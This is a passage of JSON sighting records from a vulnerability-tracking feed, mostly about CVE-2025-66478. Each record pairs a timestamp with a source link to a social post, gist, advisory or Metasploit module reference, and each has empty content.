"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m7btq7veys2p", "content": "", "creation_timestamp": "2025-12-06T01:24:30.483159Z"}, {"uuid": "344a8f32-7c49-4357-a6f3-b6a649f5c9a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3m7bwmka4cx2q", "content": "", "creation_timestamp": "2025-12-06T02:16:07.331417Z"}, {"uuid": "80457884-3fa4-4095-b9b4-e04751482109", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3m7c6m5jlr42r", "content": "", "creation_timestamp": "2025-12-06T04:39:04.819843Z"}, {"uuid": "e9d2b476-e92e-4114-bcf6-f8b1d85682a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3m7ce7c4lfu2u", "content": "", "creation_timestamp": "2025-12-06T06:19:15.382217Z"}, {"uuid": "d5264684-d691-4e81-a4ca-13b202df62e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/r-blueteamsec.bsky.social/post/3m7chtzw7bu2y", "content": "", "creation_timestamp": "2025-12-06T07:24:32.321376Z"}, {"uuid": "f19ce7df-7d22-491b-a4aa-759962c78522", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/ka-ka-xyz.bsky.social/post/3m7cokn5goc26", "content": "", "creation_timestamp": "2025-12-06T09:22:38.418172Z"}, {"uuid": "4f9b1252-c468-4228-9927-253a31a1d75c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://advisories.ncsc.nl/advisory?id=NCSC-2025-0380", "content": "", "creation_timestamp": "2025-12-05T11:13:36.000000Z"}, {"uuid": "4d8c812b-39d9-47fa-ac92-de916844151d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/fancypenguin.party/post/3m7apukr2w22s", "content": "", "creation_timestamp": "2025-12-05T14:42:42.287296Z"}, {"uuid": "e9573089-9820-4033-90fc-6c833f683531", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3m77gfn66pz22", "content": "", "creation_timestamp": "2025-12-05T02:20:36.910319Z"}, {"uuid": "5bf94f4f-190a-43b7-877c-99f42439d127", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3m77istmvht2b", "content": "", "creation_timestamp": "2025-12-05T03:03:47.489955Z"}, {"uuid": "a41187ed-f87c-4e77-8780-3fbeb55e59e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/blackhatnews.tokyo/post/3m77kkrz2nc2w", "content": "", "creation_timestamp": "2025-12-05T03:35:04.271747Z"}, {"uuid": "01ebb131-ff8f-473a-b64f-cd4c048268c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/shehackspurple.bsky.social/post/3m77lunhzvo2n", "content": "", "creation_timestamp": "2025-12-05T03:58:28.675156Z"}, {"uuid": "ec459130-8385-4967-aedd-87ccc557dc6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3m77pklkaqj2n", "content": "", "creation_timestamp": "2025-12-05T05:04:27.134596Z"}, {"uuid": "9696f32e-e461-4178-94b3-4493759b34a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3m77rgb7xxj2u", "content": "", "creation_timestamp": "2025-12-05T05:37:48.496100Z"}, {"uuid": "c802d3d0-5aa3-4bc7-b188-4c52b5fa62f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3m77skl4p722u", "content": "", "creation_timestamp": "2025-12-05T05:58:43.819792Z"}, {"uuid": "236894c0-a6c7-4e22-9ef4-5d43192c8819", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/dailyzenntrends.bsky.social/post/3m7a5lwznm22z", "content": "", "creation_timestamp": "2025-12-05T09:15:44.462394Z"}, {"uuid": "fd2b7d46-f555-450d-a88d-8a153ae7ee56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/concisecyber.bsky.social/post/3m7as2jywwr2r", "content": "", "creation_timestamp": "2025-12-05T15:21:48.431545Z"}, {"uuid": "08cfcc5f-6403-4977-a0bf-d224b9ed1232", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-e68b039c-09853fdddee225e0", "content": "", "creation_timestamp": "2025-12-05T15:48:40.965678Z"}, {"uuid": "87adb5f0-9e20-4c54-8b80-d5aafa4ba8d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115667824274327184", "content": "", "creation_timestamp": "2025-12-05T16:08:52.520027Z"}, {"uuid": "cfdf4455-8685-401f-a548-f4ec091bd6d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-66478", "type": "seen", "source": "https://bsky.app/profile/stroz.infosec.exchange.ap.brid.gy/post/3m7awptwj7bj2", "content": "", "creation_timestamp": "2025-12-05T16:46:14.438982Z"}, {"uuid": "60651dfe-56fa-4854-af02-72950932e91a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/cybersecurity.page/post/3m7azw7ck5a2q", "content": "", "creation_timestamp": "2025-12-05T17:42:32.855917Z"}, {"uuid": "bc7d3d15-33ef-4eee-a454-fe7779e583bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115668280160347822", "content": "", "creation_timestamp": "2025-12-05T18:04:51.511808Z"}, {"uuid": "9d74b355-22f9-413a-ac95-8a1a66bd4ae4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/Viss.mastodon.social.ap.brid.gy/post/3m7b3clampv62", "content": "", "creation_timestamp": "2025-12-05T18:07:58.686252Z"}, {"uuid": "12ce7eeb-7442-4814-b4af-a2cb954db2e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/diegobetto.com/post/3m7a7z2a55s24", "content": "", "creation_timestamp": "2025-12-05T09:58:51.749932Z"}, {"uuid": "c1a120c4-bb31-47dc-a7c1-68e4629a4e87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-66478", "type": "seen", "source": "https://infosec.exchange/users/shadowserver/statuses/115672050969855947", "content": "", "creation_timestamp": "2025-12-06T10:03:49.697598Z"}, {"uuid": "cf24301d-f8d4-475a-933d-5ce5a0129e12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3m7lysor63o2w", "content": "", "creation_timestamp": "2025-12-10T02:21:58.494137Z"}, {"uuid": "7555dc74-b025-4a28-ad78-4c23a6a84432", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66471", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3m7cxc6c2za24", "content": "", "creation_timestamp": "2025-12-06T12:00:53.981137Z"}, {"uuid": "9008ed41-3db2-4a47-92f7-5d15199e60b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/r-blueteamsec.bsky.social/post/3m7d5nftu7a2k", "content": "", "creation_timestamp": "2025-12-06T13:54:32.475647Z"}, {"uuid": "5f4e197c-af95-49cd-9194-ebbebd3784fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-66478", "type": "seen", "source": "https://bsky.app/profile/nextjs.org/post/3m7dfq6d2f22j", "content": "", "creation_timestamp": "2025-12-06T16:19:15.270112Z"}, {"uuid": "069f3abb-9c81-45a2-97b9-aa65c2118228", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115674416147922293", "content": "", "creation_timestamp": "2025-12-06T20:05:17.324596Z"}, {"uuid": "1498f6bb-8c0a-4bd8-9c46-35d09c4a6b2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/shehackspurple.bsky.social/post/3m7dxoiyuv62s", "content": "", "creation_timestamp": "2025-12-06T21:40:26.476408Z"}, {"uuid": "43a4ebfa-fea3-424c-b1d4-50123d112ee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3m7ehnudonx2d", "content": "", "creation_timestamp": "2025-12-07T02:26:25.189736Z"}, {"uuid": "3537eec5-b685-4bc8-b8c1-4e0579f71348", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-66478", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3m7eupruoji2i", "content": "", "creation_timestamp": "2025-12-07T06:20:07.960199Z"}, {"uuid": "eac1d924-d1c8-45d8-9c52-aa92e106fa15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/rajatsx.bsky.social/post/3m7ez6wk6wg2q", "content": "", "creation_timestamp": "2025-12-07T07:40:11.707875Z"}, {"uuid": "ffd9448c-ba31-456b-9c20-13a987aa70ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/thedailytechfeed.com/post/3m7id3pta4427", "content": "", "creation_timestamp": "2025-12-08T15:15:20.049147Z"}, {"uuid": "2fc8b632-3d38-4577-aac4-b58ea53edff8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/crispytaytortot.com/post/3m7ijrqnx5k24", "content": "", "creation_timestamp": "2025-12-08T17:15:00.706397Z"}, {"uuid": "482c9646-15a7-48f0-b5c8-90e825f5a74e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/terrorbyte/379039582842de7f363469b6b1df0c3b", "content": "", "creation_timestamp": "2025-12-08T19:09:56.000000Z"}, {"uuid": "1d647a18-368f-46a5-af97-9ed2001d1b6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/shehackspurple.bsky.social/post/3m7iuftduxi27", "content": "", "creation_timestamp": "2025-12-08T20:25:12.590711Z"}, {"uuid": "e9285f5b-c9b6-4c88-a428-5ec2f3b12e4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/pleaz/0e2e27494976ed2a481a61de08fd51e2", "content": "", "creation_timestamp": "2025-12-08T22:07:58.000000Z"}, {"uuid": "9aa810f0-911f-4cd4-8707-98ead4245e14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m7j4m6vde22j", "content": "", "creation_timestamp": "2025-12-08T22:51:58.863940Z"}, {"uuid": "258874c4-3324-445b-98b2-38323341d650", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/amyegan.dev/post/3m7j73k3h6s2j", "content": "", "creation_timestamp": "2025-12-08T23:36:19.628482Z"}, {"uuid": "f4bb0235-a768-4cb0-8386-0c756e3df871", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3m7jibfgupm2d", "content": "", "creation_timestamp": "2025-12-09T02:20:39.015615Z"}, {"uuid": "22f524fb-8af0-4f36-baa1-184377d5365e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3m7jimjj3ow2e", "content": "", "creation_timestamp": "2025-12-09T02:26:52.252482Z"}, {"uuid": "caa33c75-3b53-4206-b343-7c515f4636a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3m7jjkri4ui2c", "content": "", "creation_timestamp": "2025-12-09T02:43:47.197612Z"}, {"uuid": "e4dd3945-2611-41c4-bb83-d86a1bcb0f21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3m7jonz2ks426", "content": "", "creation_timestamp": "2025-12-09T04:15:04.718776Z"}, {"uuid": "3e52b3d8-b1e8-4ec5-a26b-89317880b578", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-66478", "type": "seen", "source": "https://gist.github.com/spynika/20969263b0c40e1ac04287f74fa247fa", "content": "", "creation_timestamp": "2025-12-09T06:03:04.000000Z"}, {"uuid": "95d0cc94-c24d-4e86-aa5e-9759c5413008", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55102.rb", "content": "", "creation_timestamp": "2025-12-08T21:50:27.000000Z"}, {"uuid": "59f5d9f7-0a1b-4aef-8434-baf76863b2a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/secpoint.bsky.social/post/3m7kg4yqob22c", "content": "", "creation_timestamp": "2025-12-09T11:15:09.123924Z"}, {"uuid": "ce6ff238-d953-4c21-808d-5ae916a125e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/wyf9/6fff49c27a1faf6e01053c1eb5096eea", "content": "", "creation_timestamp": "2025-12-07T11:40:35.000000Z"}, {"uuid": "4519d96f-bd08-4e53-9d2a-b8f29f2386e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/shehackspurple.bsky.social/post/3m7g4xiof252o", "content": "", "creation_timestamp": "2025-12-07T18:20:16.360330Z"}, {"uuid": "4ee9762d-3fe3-4faf-9e71-4bdc2d17e631", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3m7gxtqhyd72d", "content": "", "creation_timestamp": "2025-12-08T02:21:21.270258Z"}, {"uuid": "e02db083-6cc3-45a4-bc64-7f11f7181d0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3m7hpo4rqhv2g", "content": "", "creation_timestamp": "2025-12-08T09:27:43.938555Z"}, {"uuid": "c51b8976-c5a6-4ea9-9576-105da10e84d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/concisecyber.bsky.social/post/3m7kxtvu4ew25", "content": "", "creation_timestamp": "2025-12-09T16:32:05.921136Z"}, {"uuid": "e4dda431-6a57-4363-b928-75f3c725e3c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3m7l5bwbn6a62", "content": "", "creation_timestamp": "2025-12-09T18:10:23.835208Z"}, {"uuid": "1083404d-7512-433c-a6c2-55bc7c6412a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/technews4869.bsky.social/post/3m7m7p7wxsv2u", "content": "", "creation_timestamp": "2025-12-10T04:25:18.730853Z"}, {"uuid": "858cc65a-da17-4597-80f3-8b030dad013d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/concisecyber.bsky.social/post/3m7mrwvnmll22", "content": "", "creation_timestamp": "2025-12-10T09:51:43.480273Z"}, {"uuid": "d3a3c1c1-3a80-4d59-8a6a-c1ac1757a053", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3m7ojdusgww23", "content": "", "creation_timestamp": "2025-12-11T02:23:14.539571Z"}, {"uuid": "05d7ca9a-5bb4-4590-993d-a9afdac084ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3m7ouzyrgfe2j", "content": "", "creation_timestamp": "2025-12-11T05:52:28.011516Z"}, {"uuid": "4db95ec1-9d00-4c39-ab0e-f9fb2c6dd15c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/technews4869.bsky.social/post/3m7owtt7gp62y", "content": "", "creation_timestamp": "2025-12-11T06:24:49.071200Z"}, {"uuid": "47da59bc-0dc6-4424-ad9e-6ed0a25fca36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66476", "type": "seen", "source": "http://www.zerodayinitiative.com/advisories/ZDI-25-1059/", "content": "", "creation_timestamp": "2025-12-10T05:00:00.000000Z"}, {"uuid": "90eae5ed-d83a-44fc-8fec-d611682ee0fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "MISP/b2de600f-ba5d-596d-ab6d-e16f07adabb2", "content": "", "creation_timestamp": "2025-12-10T13:32:45.000000Z"}, {"uuid": "62c63589-98ff-4fef-a452-96cd5701f7a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3m7lgxeq3wz2l", "content": "", "creation_timestamp": "2025-12-09T21:02:34.538670Z"}, {"uuid": "2e582c06-f1bc-4057-bd80-d3ea2e903c4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/concisecyber.bsky.social/post/3m7qr6jz52w2u", "content": "", "creation_timestamp": "2025-12-11T23:48:44.799161Z"}, {"uuid": "74708041-138a-4d0b-8cec-a25efe1126e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3m7qrq5jfvh25", "content": "", "creation_timestamp": "2025-12-11T23:58:35.532149Z"}, {"uuid": "01e75366-f15f-4c51-a247-1a1fc26962b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3m7qxga5xay2m", "content": "", "creation_timestamp": "2025-12-12T01:40:25.375033Z"}, {"uuid": "907609be-d9ac-49fd-88f7-f5c392d1b94b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3m7qzshjbje2f", "content": "", "creation_timestamp": "2025-12-12T02:23:07.197393Z"}, {"uuid": "5933fbed-a493-4b49-b458-f517cf9f5469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/alsapalat/36194af2c00fb648441110f7dc343a93", "content": "", "creation_timestamp": "2025-12-12T05:46:47.000000Z"}, {"uuid": "07cd3883-329c-4b6a-afeb-6e931abf5c31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/infosecsherpa.bsky.social/post/3m7rqtd3tz72w", "content": "", "creation_timestamp": "2025-12-12T09:15:08.319620Z"}, {"uuid": "3b004f00-f138-41f7-aea0-1bda501082ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66471", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3meqri7iqpx22", "content": "", "creation_timestamp": "2026-02-13T15:00:08.180795Z"}, {"uuid": "74dc3afd-2fc0-4b3e-909c-b3e474651f94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/PsProsen-Dev/68375bb45b7fcbe972438ded17b13b82", "content": "", "creation_timestamp": "2026-02-22T06:17:16.000000Z"}, {"uuid": "a6f3d658-a0cf-4356-925e-d1dae2ca0ddb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m7t4vx35ik2f", "content": "", "creation_timestamp": "2025-12-12T22:24:10.636973Z"}, {"uuid": "d493ae2c-4940-4e07-a021-9d05456231d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m7t4vy4ktc2f", "content": "", "creation_timestamp": "2025-12-12T22:24:11.703492Z"}, {"uuid": "5155e635-7e0a-4f93-8fb3-366fc29c2ad6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m7t4vzmiz22f", "content": "", "creation_timestamp": "2025-12-12T22:24:12.770344Z"}, {"uuid": "2c332b6a-e1ea-4a2a-955b-b75518715bd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 